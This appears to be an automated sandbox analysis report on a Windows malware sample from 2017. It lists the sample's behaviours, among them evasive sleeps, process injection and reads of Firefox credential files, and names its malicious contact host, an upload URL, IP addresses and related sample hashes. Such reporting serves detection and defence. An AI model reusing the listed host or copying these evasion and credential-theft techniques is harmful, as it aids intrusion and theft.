Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_00406E64 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00406E64
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_1_00406E64 FindFirstFileA,FindNextFileA,strlen,strlen,4_1_00406E64
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_00408752 FindFirstFileW,FindNextFileW,wcslen,wcslen,5_2_00408752
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_004080D9 FindFirstFileW,FindNextFileW,FindClose,5_2_004080D9
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_00408752 FindFirstFileW,FindNextFileW,wcslen,wcslen,5_1_00408752
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_004080D9 FindFirstFileW,FindNextFileW,FindClose,5_1_004080D9
Contains functionality to query system informationShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_00416AD4 memset,GetSystemInfo,5_2_00416AD4
Program exit pointsShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeAPI call chain: ExitProcess graph end nodegraph_5-37070
Queries a list of all running processesShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information queried: ProcessInformation
Contains long sleeps (>= 3 min)Show sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeThread delayed: delay time: 2000
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeThread delayed: delay time: 1000
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeThread delayed: delay time: 1000
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeThread delayed: delay time: 60000
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeThread delayed: delay time: 1000
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeThread delayed: delay time: 1000
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeThread delayed: delay time: 600000
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3176Thread sleep time: -2000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3264Thread sleep time: -1000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3264Thread sleep time: -1000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3352Thread sleep count: 55 > 30
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3352Thread sleep time: -550s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3356Thread sleep time: -60000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3356Thread sleep time: -700s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3388Thread sleep time: -180000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3404Thread sleep time: -1000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3404Thread sleep time: -1000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3372Thread sleep time: -600000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3388Thread sleep time: -60000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3284Thread sleep time: -5000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3316Thread sleep time: -500s >= -60s

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information set: NOOPENFILEERRORBOX
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_0040F6D4 memset,strcpy,memset,strcpy,strcat,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0040F6D4

Language, Device and Operating System Detection:

barindex
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_0041696F GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,5_2_0041696F
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_00407206 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,4_2_00407206
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 4_2_00406219 GetVersionExA,4_2_00406219
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wazh7fcp.default\secmod.db VolumeInformation
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wazh7fcp.default\cert8.db VolumeInformation
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wazh7fcp.default\key3.db VolumeInformation
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeQueries volume information: C:\ VolumeInformation

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behavior_graph main Behavior Graph ID: 35743 Sample:  55SKM_C281171022232... Startdate:  31/10/2017 Architecture:  WINDOWS Score:  76 1 55SKM_C281171022232... main->1      started     1541reducedSig Signatures exceeded maximum capacity for this level. 4 signatures have been hidden. 1541sig Injects a PE file into a foreign processes 1961sig Modifies the context of a thread in another process (thread injection) 3241sig Searches for Windows Mail specific files 1543reducedSig Signatures exceeded maximum capacity for this level. 4 signatures have been hidden. 1543sig Injects a PE file into a foreign processes 1963sig Modifies the context of a thread in another process (thread injection) 3243sig Searches for Windows Mail specific files 1544reducedSig Signatures exceeded maximum capacity for this level. 5 signatures have been hidden. 1545reducedSig Signatures exceeded maximum capacity for this level. 5 signatures have been hidden. 1544sig Injects a PE file into a foreign processes 1964sig Modifies the context of a thread in another process (thread injection) 1545sig Injects a PE file into a foreign processes 1965sig Modifies the context of a thread in another process (thread injection) d1e283174 alsharfigroup.com 65.60.11.250, 80 SINGLEHOP-LLC-SingleHopIncUS United States d1e273055 alsharfigroup.com 1->1541reducedSig 1->1541sig 1->1961sig 1->3241sig 3 55SKM_C281171022232... 12 4 1->3      started     3->1543reducedSig 3->1543sig 3->1963sig 3->3243sig 3->d1e283174 3->d1e273055 4 55SKM_C281171022232... 1 3->4      started     5 55SKM_C281171022232... 1 3->5      started     4->1544reducedSig 4->1544sig 4->1964sig 5->1545reducedSig 5->1545sig 5->1965sig process1 signatures1 process3 dnsIp3 signatures3 process4 signatures4 fileCreated3 fileCreated4

Simulations

Behavior and APIs

TimeTypeDescription
22:56:02API Interceptor233x Sleep call for process: 55SKM_C281171022232400.exe modified from: 60000ms to: 500ms
22:57:44API Interceptor1x Sleep call for process: 55SKM_C281171022232400.exe modified from: 600000ms to: 500ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

SourceDetectionCloudLink
alsharfigroup.com2%virustotalBrowse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
65.60.11.2505Quote P295 E0H000723.exe05ddcfd7bd0f162fceaf66e9bae9e7d574b43a1f730da4c5f37c88dabb3fbee2maliciousBrowse
  • alsharfigroup.com/ph7cms/data/system/modules/web/image/upload.php
49Transfer slip 4th october.exe65467b2fd4548b407e3ae07b5ca28773caae4f65f0cf5af60d447ec577735f9emaliciousBrowse
  • alsharfigroup.com/ph7cms/data/system/modules/web/image/upload.php
37Transfer slip 4th october.exe02985ecfb351de15a8793c879ffbcc3b05c3d7b65b4ebacaef3e16453288807amaliciousBrowse
  • alsharfigroup.com/ph7cms/data/system/modules/web/image/upload.php
59Quote P295 E0H000723.exeaad3b459ea6601c90903b423f61bd66a27e21422819a3bb310a3d98e658b2fdbmaliciousBrowse
  • alsharfigroup.com/ph7cms/data/system/modules/web/image/upload.php
34SKM_C281171022232400.exeb087bef52d494fc65492e5db52bfca51b3495a954b9abdcacdcb3c19ea4909e8maliciousBrowse
  • alsharfigroup.com/ph7cms/data/system/modules/web/image/upload.php

Domains

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
alsharfigroup.com5Quote P295 E0H000723.exe05ddcfd7bd0f162fceaf66e9bae9e7d574b43a1f730da4c5f37c88dabb3fbee2maliciousBrowse
  • 65.60.11.250
49Transfer slip 4th october.exe65467b2fd4548b407e3ae07b5ca28773caae4f65f0cf5af60d447ec577735f9emaliciousBrowse
  • 65.60.11.250
37Transfer slip 4th october.exe02985ecfb351de15a8793c879ffbcc3b05c3d7b65b4ebacaef3e16453288807amaliciousBrowse
  • 65.60.11.250
59Quote P295 E0H000723.exeaad3b459ea6601c90903b423f61bd66a27e21422819a3bb310a3d98e658b2fdbmaliciousBrowse
  • 65.60.11.250
34SKM_C281171022232400.exeb087bef52d494fc65492e5db52bfca51b3495a954b9abdcacdcb3c19ea4909e8maliciousBrowse
  • 65.60.11.250

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
SINGLEHOP-LLC-SingleHopIncUShttp://ksksks.barsiksuperkot.org/?utm_medium=0b55674fb5dbcffa531ca5159eb4b7420bc4fb78&utm_campaign=177maliciousBrowse
  • 99.198.108.197
62xODR16xfHn.exed331a13b5099238cdea6c0eb671f45a0abad6435cbac624ce9e9da9648093292maliciousBrowse
  • 184.154.34.130
Tracking#2030746424-RYV#QZK (28 Sep 17).doc75b5917957afff62ae3e9b349f0cd9ef63d06b68cb9ed32ad08158b42bf66b4fmaliciousBrowse
  • 77.104.144.54
paymant.xls683a02ae09a10ebafd3658e6b958fc9d35337ea0985b4fdacc037e089f12d4b6maliciousBrowse
  • 37.60.244.119
BUNZBzsGYF.exe9a03851292b4bf75ccdb12a9a09055b0c82b044c5a7a543a52ef8ed7546033a9maliciousBrowse
  • 173.236.48.139
5Quote P295 E0H000723.exe05ddcfd7bd0f162fceaf66e9bae9e7d574b43a1f730da4c5f37c88dabb3fbee2maliciousBrowse
  • 65.60.11.250
mededsys.com/zeLrq/maliciousBrowse
  • 173.236.11.203
49Transfer slip 4th october.exe65467b2fd4548b407e3ae07b5ca28773caae4f65f0cf5af60d447ec577735f9emaliciousBrowse
  • 65.60.11.250
37Transfer slip 4th october.exe02985ecfb351de15a8793c879ffbcc3b05c3d7b65b4ebacaef3e16453288807amaliciousBrowse
  • 65.60.11.250
malware.docc9210a349a1b50461703f7ef2b2f988b847e74a00bcf8735ee2b4cf9712b1fa3maliciousBrowse
  • 181.224.136.208
59Quote P295 E0H000723.exeaad3b459ea6601c90903b423f61bd66a27e21422819a3bb310a3d98e658b2fdbmaliciousBrowse
  • 65.60.11.250
http://amazongiftcard.codegenerator.xyz/maliciousBrowse
  • 198.20.117.148
34SKM_C281171022232400.exeb087bef52d494fc65492e5db52bfca51b3495a954b9abdcacdcb3c19ea4909e8maliciousBrowse
  • 65.60.11.250
2017-27878.doc4bc6d7e5960831476f33ac3d9f632ebae9c2a22aa975d20fffb0830b94bf3143maliciousBrowse
  • 173.236.11.203

Dropped Files

No context

Screenshot